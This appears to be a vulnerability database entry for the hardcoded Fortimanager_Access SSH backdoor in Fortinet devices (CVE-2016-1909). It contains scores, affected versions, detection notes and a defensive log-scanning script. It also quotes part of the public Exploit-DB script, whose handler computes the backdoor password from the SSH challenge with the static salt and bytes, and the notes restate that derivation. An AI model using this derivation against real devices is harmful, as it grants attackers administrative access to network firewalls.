CVE-2016-1909
Published: 2016-01-15
Priority: P1 · 84 · critical · 9.8 (CVSS 3.0)
Exploit: public exploit available · EPSS 71.27% (99.3rd percentile)
Fortinet FortiAnalyzer before 5.0.12 and 5.2.x before 5.2.5; FortiSwitch 3.3.x before 3.3.3; FortiCache 3.0.x before 3.0.8; and FortiOS 4.1.x before 4.1.11, 4.2.x before 4.2.16, 4.3.x before 4.3.17 and 5.0.x before 5.0.8 have a hardcoded passphrase for the Fortimanager_Access account, which allows remote attackers to obtain administrative access via an SSH session.
Affected: 10 ranges (only one populated)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | fortios | <= 4.3.16 | — |
Detection & IOCs (extracted from sources)
Static bytes appended to the SHA1 input (the `static_bytes` of the challenge-response scheme in the notes below): `\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70`
- Detect SSH authentication attempts using the hardcoded backdoor username 'Fortimanager_Access' on Fortinet devices; any login attempt with this username should be treated as malicious.
- The exploit uses SSH keyboard-interactive authentication (auth_interactive) after an initial password auth attempt; monitor for this two-step SSH auth sequence targeting 'Fortimanager_Access'.
- The challenge-response password is computed as 'AK1' + base64(\x00*12 + SHA1(\x00*12 + challenge + 'FGTAbc11*xy+Qqz27' + static_bytes)); network signatures can match the 'AK1' prefix in SSH keyboard-interactive responses.
- A Metasploit auxiliary scanner module exists for mass-scanning this backdoor; watch for automated SSH scanning activity against Fortinet devices on port 22.
- Affected platforms include FortiGate 4.x; prioritize detection on FortiOS 4.1.x, 4.2.x, 4.3.x, 5.0.x, FortiAnalyzer before 5.0.12/5.2.5, FortiSwitch 3.3.x, and FortiCache 3.0.x.
- The backdoor account 'Fortimanager_Access' is hardcoded in firmware; patching to fixed versions is required to remove it — detection alone is insufficient for remediation.
- The challenge-response mechanism uses a static salt string ('FGTAbc11*xy+Qqz27') and a static byte sequence appended to the SHA1 hash, meaning the password is deterministically computable from any SSH challenge — blocking the username is the only reliable network-level control.
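As an added detection example, not part of this record or of any vendor tooling: a Python scanner over constructed key=value log lines that flags both the hardcoded username and any keyboard-interactive answer with the 'AK1' + base64(12 zero bytes + 20-byte SHA1) structure described in the notes above. The field names `user` and `response`, the log lines and the digest bytes in the sample are all assumptions of this example; the digest is a dummy, not one computed from a challenge.

```python
import base64
import re

# Hardcoded account name from the advisory text for CVE-2016-1909.
BACKDOOR_USER = "Fortimanager_Access"

# The backdoor answer is 'AK1' + base64(12 zero bytes + 20-byte SHA1 digest);
# 32 bytes encode to exactly 44 base64 characters ending in one '='.
_AK1_RE = re.compile(r"AK1([A-Za-z0-9+/]{43}=)")


def looks_like_backdoor_response(token):
    """True if token has the exact shape of the backdoor's keyboard-interactive
    answer. Only the structure is checked; the digest is never recomputed."""
    m = _AK1_RE.fullmatch(token)
    if not m:
        return False
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error subclasses ValueError
        return False
    return len(raw) == 32 and raw[:12] == b"\x00" * 12


def scan_auth_log(lines):
    """Return (line_number, reason) for each suspicious key=value log line.
    The field names 'user' and 'response' are an assumption of this example."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = dict(re.findall(r'(\w+)="?([^"\s]*)"?', line))
        if fields.get("user") == BACKDOOR_USER:
            hits.append((n, "backdoor username"))
        if looks_like_backdoor_response(fields.get("response", "")):
            hits.append((n, "AK1 challenge-response format"))
    return hits


# Constructed sample: the 20 digest bytes are a dummy (0x11 * 20), not a value
# derived from any real challenge.
DUMMY_RESPONSE = "AK1" + base64.b64encode(b"\x00" * 12 + b"\x11" * 20).decode()
SAMPLE_LOG = [  # constructed lines, not real FortiOS output
    'date=2016-01-12 time=03:14:07 ui=ssh(198.51.100.7) user="admin" action=login status=success',
    'date=2016-01-12 time=03:14:09 ui=ssh(198.51.100.7) user="Fortimanager_Access" action=login status=failed',
    'date=2016-01-12 time=03:14:10 ui=ssh(198.51.100.7) user="Fortimanager_Access" '
    'method=keyboard-interactive response="' + DUMMY_RESPONSE + '"',
]

if __name__ == "__main__":
    for n, reason in scan_auth_log(SAMPLE_LOG):
        print("line %d: %s" % (n, reason))
```

Because the keyboard-interactive answer travels inside the encrypted SSH session, the AK1 structure check only applies to logs from the device itself or from an SSH-terminating proxy, not to raw packet captures; the username check is the part that works on any authentication log.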
CVSS provenance
- NVD, CVSS v3.0: 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- NVD, CVSS v2.0: 10.0 CRITICAL (AV:N/AC:L/Au:N/C:C/I:C/A:C)
No detection rules found.
Exploit-DB
Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access (exploitdb, 2016-01-09; CVE-2016-1909)
Platform: Fortinet FortiGate 4.x
```python
import socket
import select
import sys
import paramiko
from paramiko.py3compat import u
import base64
import hashlib
import termios
import tty

def custom_handler(title, instructions, prompt_list):
    # Keyboard-interactive handler: the device's challenge arrives as the first
    # prompt, and the answer is derived from it with the static salt and bytes.
    n = prompt_list[0][0]
    m = hashlib.sha1()
    m.update('\x00' * 12)
    m.update(n + 'FGTAbc11*xy+Qqz27')
    m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
    h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
    return [h]

def main():
    if len(sys.argv) < 2:
        print 'Usage: ' + sys.argv[0] + ' <host>'
        exit(-1)
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
    except paramiko.ssh_exception.SSHException:
        pass
    trans = client.get_transport()
    try:
```
Metasploit
Fortinet SSH Backdoor Scanner (metasploit)
This module scans for the Fortinet SSH backdoor.
References
- http://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios
- http://packetstormsecurity.com/files/135225/FortiGate-OS-5.0.7-SSH-Backdoor.html
- http://seclists.org/fulldisclosure/2016/Jan/26
- http://www.fortiguard.com/advisory/multiple-products-ssh-undocumented-login-vulnerability
- http://www.securitytracker.com/id/1034663
- https://twitter.com/esizkur/status/686842135501508608
- https://www.exploit-db.com/exploits/39224/